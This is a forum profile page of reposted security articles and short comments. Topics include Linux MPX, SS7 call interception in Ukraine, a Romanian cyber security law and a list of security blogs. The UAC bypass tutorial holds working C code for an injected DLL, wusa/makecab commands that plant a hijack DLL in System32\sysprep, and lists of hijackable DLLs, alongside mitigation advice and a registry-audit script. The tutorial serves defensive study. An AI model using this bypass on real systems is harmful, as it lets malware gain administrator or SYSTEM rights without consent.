Nytro
Administrators
Posts: 18715
Days Won: 701
Everything posted by Nytro

  1. [h=1]Linux 3.19 Kernel Adds Intel MPX Support For Skylake[/h]
[h=2]Published on 09 December 2014 11:12 AM EST Written by Michael Larabel in Linux Kernel[/h]
We've been talking about Intel MPX support in the kernel for one year, and with the upcoming Linux 3.19 kernel that support is finally being realized. MPX in this context is short for Memory Protection Extensions. Intel Memory Protection Extensions is an x86 ISA extension aiming to increase software security by checking pointer references, protecting against buffer overflows or underflows. The kernel-side support goes along with compiler changes for enabling MPX. This software security/debug feature is being introduced on the hardware side with next year's Skylake processors.
There are over one thousand lines of new code for supporting x86 MPX within the kernel, and that code is now slated to land in Linux 3.19. Thomas Gleixner sent in the pull request. "MPX is a new debug feature for bound checking in user space. It requires kernel support to handle the bound tables and decode the bound violating instruction in the trap handler."
The Linux 3.19 kernel also brings other initial enablement for Skylake, including initial graphics support.
Source: [Phoronix] Linux 3.19 Kernel Adds Intel MPX Support For Skylake
  2. Taking up the Gauntlet: SS7 Attacks
Cathal McDaid, 16th December 2014
There have been several recent reports in the media on the results of new research into the SS7 network. This interesting research outlines a series of techniques potential attackers can use to listen in to and read the calls and text messages of others. An obvious question for those of us in the telecom security industry is whether the threat is real and what we should do to address it. In considering an answer, we can look at a little-reported incident that occurred in Ukrainian mobile networks earlier this year.
Last May, a report was issued by the Ukrainian Telecom Regulator (NKRZI[1]). This document, which went essentially unreported by the press outside of Ukraine and Russia, contains the result of the investigation of the NKRZI, assisted by the Ukrainian Security Service (SBU), into telecom network activity over several days in MTS Ukraine. The key findings of this report were that over a 3 day period in April 2014, a number of Ukrainian mobile subscribers were affected by suspicious/custom SS7[2] packets from telecom network elements with Russian addresses, causing their location and potentially the contents of their phone calls to be obtained.
The 'attacks' outlined in the document involved SS7 packets being sent between the mobile operators. Without going into specific details, what occurred is that a series of SS7 packets were received by MTS Ukraine's SS7 network which modified control information stored in network switches for a number of MTS Ukraine mobile users. In doing so, when someone tried to ring one of the affected mobile subscribers, their call would be forwarded to a physical land line number in St. Petersburg, Russia, without their knowledge; in effect the call had been intercepted. There is an additional further step that could be taken for the interception, not outlined in the original Ukrainian report, but suggested by the Washington Post article. The forwarded-to number could have initiated a new call to the original targeted subscriber, and then conferenced in the intercepted call, thus allowing itself to listen in to the call without the participants being aware.
In the document, the investigation stated that the custom SS7 packets themselves came from links allocated to MTS Russia, the parent company of MTS Ukraine. The Ukrainian regulator then assigned responsibility for the nodes that generated the SS7 based on the origination addresses in the SS7 packets received. According to the report, some of the SS7 source addresses that originated the attack were assigned to MTS Russia, while others were assigned to Rostov Cellular Communications. It's important to keep in mind that this is the report from one side only, and it is stated that they "draw conclusions about the potential for the interference with operation of telecom networks on the part of the PSTN area in the Russian Federation"; however, in the report the regulator felt that MTS Ukraine was not doing enough to maintain the privacy of subscribers' locations and call forwarding routes. For its part, MTS Russia denied that the SS7 address used was under its control, thus leaving the ultimate instigator a mystery. Indeed, in subsequent follow-ups it was reported that MTS Ukraine was not alone in being at risk, as the Ukrainian Telecom Regulator stated at a later date that Astelit and Kyivstar, the other main Ukrainian mobile operators, also experienced 'external interference'. Whilst we don't have information on the exact subscribers affected, there have been examples of very sensitive phone calls being intercepted by unknown means within the region, when using non-government-issued cell phones. It is purely speculation on our part, but the same SS7 techniques outlined in the report could conceivably have been used to help achieve these interceptions.
Looking forward, an unfortunate, but seemingly inevitable, side-effect of these techniques is that they will lead countries that have been affected adversely by SS7 attacks to attempt to build their own capability, thus leading to an 'SS7 arms race'. This has already been experienced in Ukraine, where new legislation has been submitted that one media source stated will allow their security services to legally listen in turn to subscribers of foreign mobile operators, track their location and obtain 'other' information about the activity of subscribers. Taken to extremes between countries, this would lead to a form of 'mutually assured surveillance', with mobile operators and mobile phone users on both sides suffering.
The Ukrainian report, and the recent research that has been released, shows us that we have moved into uncharted territory. Yes, there is a threat, and it is real, as the above example shows; however, it does require considerable technical expertise to do this level of network interference. Not only to run and operate SS7 nodes capable of doing this, but especially to gain access to the SS7 network in the first place. Plus the nature of the risk is very different: consider that there are more users of the SS7 network worldwide than there are users of the internet, yet the number of attacks on IP networks every day dwarfs what is known to occur over SS7. The SS7 network is working as designed, but 'bad actors' are increasingly trying to exploit it; the real danger is that we assume that nothing can be done to fix the problem and it will just get worse as more 'bad actors' try to get access. As has been said by others, as an industry we need to work together to define recommendations and implement solutions to detect and stop potential attacks, because defences are possible and can make a difference if deployed correctly.
This coordination is already well underway, and AdaptiveMobile are helping to contribute to this, but no-one should doubt the amount of work and effort that will be required to completely secure the SS7 network from organisations that would seek to exploit it. However, at the same time it would be a mistake for those using these techniques offensively to assume that their activities and methods have gone unnoticed. We are now entering the more public stage of a struggle in which the gauntlet was thrown down some time ago.
[Figure: example AdaptiveMobile visualisation of SS7 activity between several mobile operators over a short time span, looking for abnormal behaviour. Colours represent a selection of different SS7 packet types. The 'clumps' are groups of similar SS7 node types.] While unrelated to the events described in the report, the purpose of such work is to help investigate ways in which to detect malicious or unusual SS7 behaviour in networks. Such methods will be called on increasingly in the future to help detect and block unwanted SS7 activity.
References:
[1] National Commission for the State Regulation of Communications and Information
[2] Signalling System 7 (SS7) is a catch-all term for a telecom network technology that is used by hundreds of cellular companies to allow them to operate and communicate with each other; it is the computer protocol used by telecom nodes within cellular networks to provide mobility control, network registration, call and text setup etc. In short, it enables mobile devices to communicate and roam globally, and it allows mobile operators to control and bill this activity. All pieces of network hardware that operate in the core network use SS7 to interoperate with the rest of the network.
Source: AdaptiveMobile - mobile network protection and security solutions
  3. Bypassing Windows User Account Control (UAC) and ways of mitigation
Securing machines from abuse and compromise in a corporate environment has always been an ongoing process. Providing admin rights to users has always been abused, as users end up installing unapproved software, changing configurations, etc. Don't give them local admin rights and they claim they can't do their work. If malware happens to compromise the machine with full admin rights then you are most likely looking at reimaging the machine.
User Account Control (UAC) gives us the ability to run with standard user rights instead of full administrator rights. So even if your standard user account is in the local admin group, damage is limited, i.e. installing services, drivers, writing to secure locations, etc. are denied. To carry out these actions users would need to interact with the desktop, such as right-click and "Run as administrator", or accept the UAC elevation prompt. UAC was introduced from Windows Vista onwards and contains a number of technologies that include file system and registry virtualization, the Protected Administrator (PA) account, UAC elevation prompts and Windows integrity levels.
UAC works by adjusting the permission level of our user account, so program actions are carried out as a standard user even if we have local admin rights on the computer. When changes are going to be made that require administrator-level permission, UAC notifies us. If we have local admin rights then we can click Yes to continue, otherwise we would be prompted to enter an administrator password. This does however depend on what policies have been defined in your environment. This blog post shows how easily UAC elevation prompts can be bypassed and what actions can be taken to mitigate this threat.
Bypassing UAC
Exploiting UAC is a trivial process. There are two stages needed to achieve the bypass and elevate from standard user rights to administrator user rights. These steps have been widely published so it's nothing new, though stage 2 documents some more DLL hijacking vulnerabilities.
Stage 1: Writing to a secure location
Stage 2: Exploiting a DLL hijacking vulnerability
In order for our bypass to be successful, to start off with we need:
- A medium integrity process
- A standard user in the administrators group
- A Windows executable signed with a Microsoft code signing certificate
- The Windows executable must be located in a secure directory
- The Windows executable must also specify the autoElevate property in its manifest
Writing to a secure location
There are a couple of ways we can write to a secure location:
- Using the IFileOperation COM object
- Using the Windows Update Standalone Installer (wusa.exe)
IFileOperation COM object
The IFileOperation COM object has a method that we can use to copy files to our secure location, as the operation will auto-elevate and is able to do a privileged copy. To exploit this we inject our malicious DLL into a medium integrity process to carry out the operation. Since the COM object is set to auto-elevate, the injected process does not need to be marked for auto-elevation in its manifest.
On Windows 7, injected processes that have copied successfully are:
C:\Windows\explorer.exe
C:\Windows\System32\wuauclt.exe
C:\Windows\System32\taskhost.exe
During tests taskhost.exe only happens to work once after boot and wuauclt.exe doesn't always work, which leaves explorer.exe as the only reliable process to use.
On Windows 8, injected processes that have copied successfully are:
C:\Windows\explorer.exe
C:\Windows\System32\wuauclt.exe
C:\Windows\System32\RuntimeBroker.exe
Again explorer.exe is the only reliable process to use, I found during my tests, and the only one that worked on Windows 8.1.
The main part of the code below has been taken from MSDN with just some minor changes. The SetOperationFlags values used were taken from the UAC bypass code published here.
[code]
#include <Windows.h>
#include <Shobjidl.h>
#include <stdio.h>
#pragma comment(lib, "Ole32.lib")
#pragma comment(lib, "shell32.lib")

// Injected into a medium-integrity process (explorer.exe). IFileOperation auto-elevates
// the copy, so the payload lands in the protected sysprep directory without a UAC prompt.
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{
    if (fdwReason != DLL_PROCESS_ATTACH)   // only run the copy once, on load
        return TRUE;

    IFileOperation *pfo = NULL;
    IShellItem *psiFrom = NULL;
    IShellItem *psiTo = NULL;
    LPCWSTR pszSrcItem = L"calc.dll";                    // payload, relative to the host process's current directory
    LPCWSTR pszNewName = L"cryptbase.dll";               // name the auto-elevating target (sysprep.exe) will load
    LPCWSTR pszDest = L"C:\\windows\\System32\\sysprep"; // protected destination directory

    HRESULT hr = CoInitializeEx(NULL, COINIT_APARTMENTTHREADED | COINIT_DISABLE_OLE1DDE);
    if (SUCCEEDED(hr)) {
        hr = CoCreateInstance(CLSID_FileOperation, NULL, CLSCTX_ALL, IID_PPV_ARGS(&pfo));
        if (SUCCEEDED(hr)) {
            // FOFX_REQUIREELEVATION makes the shell perform the copy from an elevated context
            hr = pfo->SetOperationFlags(FOF_NOCONFIRMATION | FOF_SILENT | FOFX_SHOWELEVATIONPROMPT |
                                        FOFX_NOCOPYHOOKS | FOFX_REQUIREELEVATION | FOF_NOERRORUI);
            if (SUCCEEDED(hr)) {
                hr = SHCreateItemFromParsingName(pszSrcItem, NULL, IID_PPV_ARGS(&psiFrom));
                if (SUCCEEDED(hr)) {
                    hr = SHCreateItemFromParsingName(pszDest, NULL, IID_PPV_ARGS(&psiTo));
                    if (SUCCEEDED(hr)) {
                        hr = pfo->CopyItem(psiFrom, psiTo, pszNewName, NULL);
                        psiTo->Release();
                    }
                    psiFrom->Release();
                }
                if (SUCCEEDED(hr))
                    hr = pfo->PerformOperations();
            }
            pfo->Release();
        }
        CoUninitialize();
    }
    // Returning FALSE from DLL_PROCESS_ATTACH makes the loader unload the DLL again once the copy is done.
    return FALSE;
}
[/code]
Windows Update Standalone Installer
Another method to copy to our secure location is using the Windows Update Standalone Installer (wusa.exe). When executed, wusa.exe runs as a high integrity process as it is set to auto-elevate in its manifest. For auto-elevation the Windows executable must be signed, located in a secure directory such as C:\Windows\System32 and must specify the autoElevate property in its manifest. We use wusa.exe to extract a CAB file (cabinet archive file) to our secure location:
wusa c:\users\user1\desktop\poc.tmp /extract:c:\windows\system32\sysprep
Here in the example our cab file is called poc.tmp but we can call it whatever we like.
Windows comes with the makecab.exe tool so we can even create our cab file:
makecab c:\users\user1\desktop\CRYPTBASE.dll c:\users\user1\desktop\poc.tmp
Exploiting a DLL hijacking vulnerability
When exploiting a DLL hijacking vulnerability, the executable we are going to run again has to be signed, located in a secure directory and must specify the autoElevate property in its manifest in order to load as a high integrity process.
On Windows 7 there are three executables that could be exploited, with the associated DLLs listed below:
C:\windows\ehome\Mcx2Prov.exe
    C:\Windows\ehome\CRYPTBASE.dll
C:\windows\System32\sysprep\sysprep.exe
    C:\Windows\System32\sysprep\CRYPTSP.dll
    C:\windows\System32\sysprep\CRYPTBASE.dll
    C:\Windows\System32\sysprep\RpcRtRemote.dll
    C:\Windows\System32\sysprep\UxTheme.dll
C:\windows\System32\cliconfg.exe
    C:\Windows\System32\NTWDBLIB.DLL
On malwr.com a malware sample submitted on 25th June last year had already been using Mcx2Prov.exe to bypass UAC, and a day later an exploit had also been published. The same hash had also been flagged on VirusTotal (38/54), submitted over four months ago.
On Windows 8 there are also three executables that could be exploited, with the associated DLLs listed below:
C:\windows\System32\sysprep\sysprep.exe
    C:\windows\System32\sysprep\CRYPTBASE.dll
    C:\Windows\System32\Sysprep\dwmapi.dll
    C:\Windows\System32\Sysprep\SHCORE.dll
C:\windows\System32\cliconfg.exe
    C:\Windows\System32\NTWDBLIB.DLL
C:\windows\System32\pwcreator.exe
    C:\Windows\System32\vds.exe
    C:\Windows\System32\UReFS.DLL
Finally, on Windows 8.1 there are also three executables that could be exploited, with the associated DLLs listed below:
C:\windows\System32\sysprep\sysprep.exe
    C:\Windows\System32\Sysprep\SHCORE.dll
    C:\Windows\System32\Sysprep\OLEACC.DLL
C:\windows\System32\cliconfg.exe
    C:\Windows\System32\NTWDBLIB.DLL
C:\windows\System32\pwcreator.exe
    C:\Windows\System32\vds.exe
    C:\Program Files\Common Files\microsoft shared\ink\CRYPTBASE.dll
    C:\Program Files\Common Files\microsoft shared\ink\CRYPTSP.dll
    C:\Program Files\Common Files\microsoft shared\ink\dwmapi.dll
    C:\Program Files\Common Files\microsoft shared\ink\USERENV.dll
    C:\Program Files\Common Files\microsoft shared\ink\OLEACC.dll
Calling the pwcreator.exe (Create a Windows To Go workspace) executable calls vds.exe (Virtual Disk Service), which then loads our DLL and gives us System integrity, running as the SYSTEM account. Calling the executables sysprep.exe, cliconfg.exe and pwcreator.exe does produce a GUI window, but it should be possible to make them run in the background and terminate them after being exploited. This is something I haven't looked into so I'll leave it up to you.
Mitigation
The best way to mitigate this bypass is simply not giving users local admin rights to their machines. For the majority of user accounts in a corporate environment you should be able to do this, reducing the attack surface. This however does not apply to home users, who have local admin rights by default. The actual bypass only works when UAC is set to the middle two settings, which will let it auto-elevate.
To see your settings go to Control Panel - User Accounts - Change User Account Control settings:
- Notify me only when apps try to make changes to my computer (default)
- Notify me only when apps try to make changes to my computer (do not dim desktop settings)
So we could set it to Always notify, but this would bring it back to how it was on Windows Vista with constant notifications, which is not really practical, and the user would end up setting it to Never notify, which is definitely not a good idea.
Microsoft has given us 10 UAC policies to play with, so it's worth spending some time understanding and testing these before implementing them in your own domain environment. To see what is applied on your local machine type secpol.msc into Start-Run to open the Local Security Policy snap-in and expand the Local Policies - Security Options folder. Run rsop.msc to view group policies applied on machines in a domain environment.
Looking in the registry, these are the default values of UAC:
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System]
"ConsentPromptBehaviorAdmin"=dword:00000005
"ConsentPromptBehaviorUser"=dword:00000003
"EnableInstallerDetection"=dword:00000001
"EnableLUA"=dword:00000001
"EnableSecureUIAPaths"=dword:00000001
"EnableUIADesktopToggle"=dword:00000000
"EnableVirtualization"=dword:00000001
"FilterAdministratorToken"=dword:00000000
"PromptOnSecureDesktop"=dword:00000001
"ValidateAdminCodeSignatures"=dword:00000000
When the slider is moved up to "Always notify me" it changes this value:
"ConsentPromptBehaviorAdmin"=dword:00000002
When the slider is moved down to "Notify me only when apps try to make changes to my computer (do not dim desktop settings)" it changes this value:
"PromptOnSecureDesktop"=dword:00000000
And when the slider is moved to "Never notify" the values changed are:
"ConsentPromptBehaviorAdmin"=dword:00000000
"EnableLUA"=dword:00000000
"PromptOnSecureDesktop"=dword:00000000
Take note that EnableLUA has been disabled completely. This is an extremely dangerous state to be in and it should never be disabled, so it is strongly recommended to set this policy to Enabled in group policy so it always gets applied if the setting is reset/changed by users or by previously removed malware:
User Account Control: Run all administrators in Admin Approval Mode
Once disabled, not only could a malicious process go straight to high integrity without any bypass, but Internet Explorer would also run at medium integrity. UAC gives us Protected Mode (sandbox) in Internet Explorer, providing added security. Internet Explorer normally runs as a low integrity child process, so if it is compromised by some IE exploit the damage is minimized, as at low integrity there are only a handful of locations on the system it can write to.
The changes mentioned above have been seen on Windows 7. On Windows 8/8.1 EnableLUA does not change to disabled. So when the slider is moved to Never notify the only values changed are:
"ConsentPromptBehaviorAdmin"=dword:00000000
"PromptOnSecureDesktop"=dword:00000000
Since the value "EnableLUA"=dword:00000001 does not change, UAC is not completely disabled and Internet Explorer would still run at low integrity.
If however a user logs on to a machine using the local admin account (Administrator, or whatever it is renamed to on your corporate build), UAC settings do not apply, as all processes run at high integrity. This applies to Windows 7/8 and 8.1, so always make sure users DO NOT log on using the local admin account; if local admin rights are required, better add their domain account to the local administrators group. If for whatever reason logging on using the local admin account is a necessity then it is best to set this UAC policy to Enabled:
User Account Control: Admin Approval Mode for the built-in Administrator account
"FilterAdministratorToken"=dword:00000001
Another option would be to look into renaming or deleting the executables Mcx2Prov.exe, sysprep.exe, cliconfg.exe and pwcreator.exe if they are definitely not required on the system, so the second stage of the exploit (DLL hijacking) fails.
Finally, if users do require local admin privileges then it is worth setting their machine's UAC policy to Always notify and they live with the constant notifications:
User Account Control: Behavior of the elevation prompt for administrators in Admin Approval Mode (2 - Prompt for consent on the secure desktop)
Conclusion
This bypass only works when all of the requirements are available to abuse. Remove one requirement and the bypass will fail. Office documents are opened at medium integrity so these are ideal targets to abuse the UAC bypass. Since these bypasses are so effortlessly achieved, the only real course of action would be to set UAC to "Always notify" or remove local admin rights for the user. In the end, using agents like Microsoft EMET or Malwarebytes Anti-Exploit would be the best mitigating action to take against being exploited in the first place.
Here are the source and binaries you can test for yourself. I tested it on Windows Enterprise 7/8/8.1 64-bit.
References
User Account Control: Inside Windows 7 User Account Control
Security: Inside Windows Vista User Account Control
What is User Account Control? - Windows Help
What are User Account Control settings? - Windows Help
User Account Control - What Penetration Testers Should Know | Strategic Cyber LLC
Source: Bypassing Windows User Account Control (UAC) and ways of mitigation | GreyHatHacker.NET
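An added example, not part of the GreyHatHacker post above: a small Python audit that reads a .reg export of the UAC policy key, maps the three values the slider touches to the four slider positions the post describes, and flags the states the post warns about (EnableLUA=0, the built-in Administrator without Admin Approval Mode, and the two middle slider positions the auto-elevate bypass works against). The sample .reg text is constructed here from the default values quoted in the post; on a real machine export the key with `reg export "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" uac.reg` and pass the file as the first argument. The severity labels and the "custom" bucket are assumptions of this example, not values from the post.

```python
r"""Audit UAC slider state from a .reg export of
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System.
Added example; the slider-to-value mapping follows the registry changes in the post.
"""
import re
import sys
from typing import Dict, List

UAC_KEY = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System"

# Constructed sample input: the default values quoted in the post, in reg.exe export format.
SAMPLE_REG_DEFAULT = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System]
"ConsentPromptBehaviorAdmin"=dword:00000005
"ConsentPromptBehaviorUser"=dword:00000003
"EnableInstallerDetection"=dword:00000001
"EnableLUA"=dword:00000001
"EnableSecureUIAPaths"=dword:00000001
"EnableUIADesktopToggle"=dword:00000000
"EnableVirtualization"=dword:00000001
"FilterAdministratorToken"=dword:00000000
"PromptOnSecureDesktop"=dword:00000001
"ValidateAdminCodeSignatures"=dword:00000000
"""

_DWORD_LINE = re.compile(r'^"([^"]+)"=dword:([0-9A-Fa-f]{8})$')


def parse_reg_dwords(text: str, key: str = UAC_KEY) -> Dict[str, int]:
    """Return the REG_DWORD values stored directly under `key` in a .reg export."""
    values: Dict[str, int] = {}
    in_key = False
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            in_key = line[1:-1].lower() == key.lower()   # key names are case-insensitive
            continue
        m = _DWORD_LINE.match(line) if in_key else None
        if m:
            values[m.group(1)] = int(m.group(2), 16)
    return values


def uac_slider_level(v: Dict[str, int]) -> str:
    """Map ConsentPromptBehaviorAdmin / PromptOnSecureDesktop / EnableLUA to a slider position.

    Missing values count as the defaults (5 / 1 / 1). Windows 8/8.1 keeps EnableLUA=1 at
    'Never notify', so ConsentPromptBehaviorAdmin=0 on its own is treated as that position too.
    """
    admin = v.get("ConsentPromptBehaviorAdmin", 5)
    secure = v.get("PromptOnSecureDesktop", 1)
    lua = v.get("EnableLUA", 1)
    if lua == 0 or admin == 0:
        return "never-notify"
    if admin == 2 and secure == 1:
        return "always-notify"
    if admin == 5 and secure == 1:
        return "default"
    if admin == 5 and secure == 0:
        return "no-dim"
    return "custom"          # assumption: anything else was set by policy, not the slider


def audit_uac(v: Dict[str, int]) -> List[str]:
    """One finding per weak setting, most severe first; an empty list means nothing to report."""
    findings: List[str] = []
    level = uac_slider_level(v)
    if v.get("EnableLUA", 1) == 0:
        findings.append("CRITICAL: EnableLUA=0, UAC is fully off and IE Protected Mode is lost")
    if level == "never-notify":
        findings.append("HIGH: slider at Never notify, admin processes elevate silently")
    elif level in ("default", "no-dim"):
        findings.append("MEDIUM: slider at '%s', auto-elevating binaries can be abused to skip the prompt" % level)
    if v.get("FilterAdministratorToken", 0) == 0:
        findings.append("MEDIUM: FilterAdministratorToken=0, built-in Administrator has no Admin Approval Mode")
    return findings


def load_reg_file(path: str) -> str:
    """reg.exe writes UTF-16LE with a BOM; fall back to UTF-8 for hand-written files."""
    with open(path, "rb") as fh:
        data = fh.read()
    return data.decode("utf-16") if data.startswith(b"\xff\xfe") else data.decode("utf-8")


if __name__ == "__main__":
    text = load_reg_file(sys.argv[1]) if len(sys.argv) > 1 else SAMPLE_REG_DEFAULT
    vals = parse_reg_dwords(text)
    print("slider:", uac_slider_level(vals))
    for finding in audit_uac(vals) or ["OK: no weak UAC settings found"]:
        print(finding)
```

Run without arguments it audits the constructed default values and reports the two findings the post's mitigation section leads with: the default slider position is bypassable, and the built-in Administrator is unfiltered. A hardened export (ConsentPromptBehaviorAdmin=2, FilterAdministratorToken=1) produces no findings.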
  4. x86?
  5. It doesn't seem to work.
  6. It worked for me. Note: Please use a virtual machine. It may be infected.
  7. I'm not sure, but it may still be current. I don't know much about this position, but if you send me your CVs by PM, they will reach the right person.
  8. They show up for me now, but if you still have problems with certain images, post here.
  9. Traian Basescu on the cyber security law: There must be judicial oversight of the security structures' access to operators' databases. / The measure can prevent terrorist and cyber attacks. Care must be taken not to
  10. The Cyber Security Law does not apply to natural persons | adevarul.ro
  11. Protests: The cyber security law brings Romanians into the streets. Several protests were announced on Sunday across the country | adevarul.ro. Who can give us a link to the full text of the law's articles? Thanks.
  12. [h=1]Santa Claus brings us a Trojan horse: cyber securitism[/h]
Author: bogdan 19/12/2014 0 Comments Opinion data access, IT audit, law, cyber security, cyber securitism, Senate
After sleeping for 3 months on the so-called cyber security law, the Senate woke up shortly before Christmas. After 9 December, in a session to which only the SRI, MAI and MSI were invited, the National Security Committee confirmed (with non-essential changes) the SRI's draft law on cyber securitism. (Although we sent our criticisms of the current text repeatedly, they did not even publish them on the site, let alone take them into consideration.) Then today, 19 December, the draft passed quickly through the Senate and was voted through unanimously (I wonder whether those people know what they are raising their hands for).
The law is practically adopted by Parliament, but it is not yet in force. In theory, the opposition MPs can challenge it at the Constitutional Court. If it is not sent to the CCR, the law will be sent for promulgation to Cotroceni, where President Klaus Johannis has three options: he can promulgate it, return it to Parliament for re-examination, or send it to the Constitutional Court himself. From our point of view this will be Johannis's first real test, where he can decide whether we want to create a police state or a citizens' state.
On substance, we have written several times about the law's major problems (there is no point saying anything more about the minor ones):
Art. 17 - All holders of cyber systems (i.e. all legal entities that own a computer, see Art. 2) must "allow access to data" to these authorities (SRI, MApN, MAI, ORNISS, SIE, STS, SPP, CERT-RO and ANCOM). Access is granted on a mere "reasoned request". Given that today any access to computer systems holding computer data is done only with a judge's authorisation, the current text throws us into chaos. In fact, access to traffic data is also impossible today, if we are to respect the CCR decision on the traffic data retention directive. From our point of view Art. 17 is plainly unconstitutional.
Art. 16 - All holders of cyber systems (i.e. all legal entities that own a computer) will be obliged to apply cyber security policies and to identify and implement the appropriate technical and organisational measures to manage security risks effectively. That means at least 1500 euro per company invested in security. If not, a fine of 500 to 5000 RON.
Art. 10 - While the EU is discussing that the institutions dealing with cyber security should be "civilian bodies, operating fully under democratic control, and should not carry out activities in the field of intelligence", we put forward the SRI as the most democratic, civilian and citizen-friendly of institutions. It may have the technical competence, but it is not under democratic control. Nor does it know terms like public debate, access to public information or decisional transparency.
Maybe 2015 will enlighten us!
Source: APTI Link: Santa Claus brings us a Trojan horse: cyber securitism | Personal data and privacy
  13. Better article: The cyber security law was adopted unanimously. The secret services have access to internet and telephony information | adevarul.ro (screw Antena 3)
  14. Lucky for us that they are technically clueless.
  15. Ubuntu GNOME 15.04 Alpha 1
A special edition of Ubuntu Linux, built around the GNOME graphical desktop environment
Welcome to the Vivid Vervet edition of Ubuntu GNOME, an open source and free desktop-oriented operating system that uses the controversial GNOME desktop environment on top of a stable and reliable Ubuntu base.
Distributed as 64-bit and 32-bit Live DVDs
The Ubuntu GNOME distribution is available for download as two Live DVD ISO images, one for each of the supported hardware platforms (32-bit and 64-bit). Both ISOs are approximately 1 GB in size and can be written to either DVD discs or USB thumb drives of 1 GB or higher capacity.
Offers standard boot options
The boot menu is hidden by default, as the distribution will start automatically ten seconds from the moment the user inserts and boots the bootable medium (CD or USB) from the BIOS of his/her computer. Default boot options include the ability to try Ubuntu GNOME without installing it, start the installation directly, check the disc for defects, run a memory diagnostic test, as well as boot an existing OS from the local drive.
Uses the GNOME desktop environment
As expected, the distribution uses GNOME as its default and only graphical desktop environment. Its main goal is to provide Ubuntu fans who love the GNOME desktop with a distribution of Linux tailored for their needs.
Comes pre-loaded with a wide range of open-source apps
A wide range of open-source applications are included in the Ubuntu GNOME Linux distribution. Among the most popular ones, we can mention the Mozilla Firefox web browser, Evolution email and calendar client, Rhythmbox music player, Totem video player and Cheese webcam viewer. In addition, the Nautilus file manager, Empathy instant messenger, Evince document viewer, Shotwell image viewer and organizer, GIMP image editor, Transmission torrent downloader, numerous GNOME apps and tools, as well as the entire LibreOffice office suite are also included.
Reviewed by Marius Nestor, last updated on December 18th, 2014
Source: Download Ubuntu GNOME 15.04 Alpha 1 for Linux - Softpedia
  16. [h=1]Top 100+ Cyber Security Blogs & Infosec Resources[/h]
[h=2]PR8[/h]
[h=3]#1 CIO[/h] Resources related to information security, including news and opinion and more on software and application flaws and fixes, data breaches, the insider threat and the latest hacker attacks.
[h=3]#2 TechRepublic – Security[/h] TechRepublic helps IT decision-makers identify technologies and strategies to empower workers and streamline business processes. Their security section dives into the latest threats surrounding cyber security.
[h=3]#3 US Cert[/h] US-CERT's mission is to improve the nation's cybersecurity posture, coordinate cyber information sharing, and proactively manage cyber risks.
[h=3]#4 Wired's Threat Level[/h] Privacy, crime, and online security are the topics that carry the headlines here. You'll find everything from opinionated pieces to the latest threat alerts.
[h=3]#5 Zero Day from ZDNet[/h] Staying on top of the latest in software/hardware security research, vulnerabilities, threats and computer attacks. The Zero Day blog on ZDNet is a must for anyone keeping track of the industry.
[h=2]PR7[/h]
[h=3]#6 CERIAS Security Blog[/h] The Center for Education and Research in Information Assurance and Security blog is where Gene Spafford shares his expertise. It's called the center for multidisciplinary research for a reason.
[h=3]#7 CSO Online[/h] Areas of focus include information security, physical security, business continuity, identity and access management, loss prevention and more.
[h=3]#8 Dark Reading[/h] Dark Reading is a comprehensive news and information portal that focuses on IT security, helping information security professionals manage the balance between data protection and user access.
[h=3]#9 Google Online Security Blog[/h] This is Google's own security blog, which focuses on all of the latest developments in the security world. Get the latest news and insights from Google on security and safety on the Internet.
[h=3]#10 Red Tape Chronicles[/h] NBC News Red Tape Chronicles brings you news stories and information on the latest developments in the cyber security space. Find topics that range from privacy to security.
[h=3]#11 InformationWeek Security[/h] You can expect all of the latest news and zero day alerts from this IT security news site. The content is updated daily and is a major news source for everything to do with cyber security.
[h=3]#12 Internet Storm Center[/h] The Internet Storm Center gathers millions of intrusion detection log entries every day, from sensors covering over 500,000 IP addresses in over 50 countries.
[h=3]#13 Schneier On Security[/h] Bruce Schneier is an internationally renowned security technologist, called a "security guru" by The Economist. He knows his stuff and is a voice in the cyber security industry.
[h=3]#14 Securelist Cyber Security Blog[/h] This is another Kaspersky Lab web property that focuses on malware, phishing, and the cyber security industry. There is no shortage of information and news on what's happening in the cyber world.
[h=3]#15 Symantec Weblog[/h] The Symantec Weblog uses global research to provide unparalleled analysis of and protection from malware, security risks, vulnerabilities, and spam.
[h=3]#16 The Guardian's Information Security Hub[/h] The Guardian is a respected, global media company that highlights issues across many areas. Their Information Security Hub lives up to the coverage they offer in other areas and focuses on security.
[h=3]#17 Zone Alarm Cyber Security Blog[/h] Information on malware and protecting yourself online. From malware alerts to practical online security tips, the Zone Alarm blog will keep you briefed on the latest industry news.
[h=2]PR6[/h]
[h=3]#18 BH Consulting's Security Watch Blog[/h] BH Consulting's Security Watch Blog was formed to provide regular, informed content detailing everything you would want to know about information security and web threats.
[h=3]#19 Contagio Malware Dump[/h] Contagio is a collection of the latest malware samples, threats, observations, and analyses. Get informed, technical education on the newest forms of malware.
[h=3]#20 Cyber Crime & Doing Time[/h] CyberCrime & Doing Time is a blog about cyber crime and justice related issues. Gary Warner from Malcovery owns this blog and offers up educational and engaging posts on the latest threats.
[h=3]#21 David Lacey's IT Security Blog[/h] David Lacey's IT Security Blog offers the latest ideas, best practices, and business issues associated with managing security. The blog is hosted on ComputerWeekly.com.
[h=3]#22 Dell SecureWorks[/h] Dell SecureWorks' Security & Compliance blog is dedicated to providing up-to-date news and information to help IT professionals and others keep their business secure online.
[h=3]#23 F-Secure Safe & Savvy Blog[/h] Safe and Savvy blogs about how to protect your online life and the irreplaceable content on your computer. They write about real-life experiences while providing helpful tips on security issues.
[h=3]#24 Fox IT Security Blog[/h] Information technology is the main topic on the Fox IT security blog. From news to opinions, Fox IT provides excellent content for anyone interested in technology and security.
[h=3]#25 Fortinet Blog[/h] The Fortinet cyber security blog has something for everyone. There are articles on security research and industry trends, as well as a healthy section focusing entirely on Security 101.
[h=3]#26 Help Net Security[/h] Help Net Security has been a prime resource for information security news since 1998. The site always hosts fresh content including articles, new product releases, latest industry news, podcasts and more.
[h=3]#28 Infosecurity Magazine[/h] What more can you ask for? It's an online magazine dedicated entirely to the strategy, insight, and techniques that are a daily part of the cyber security industry.
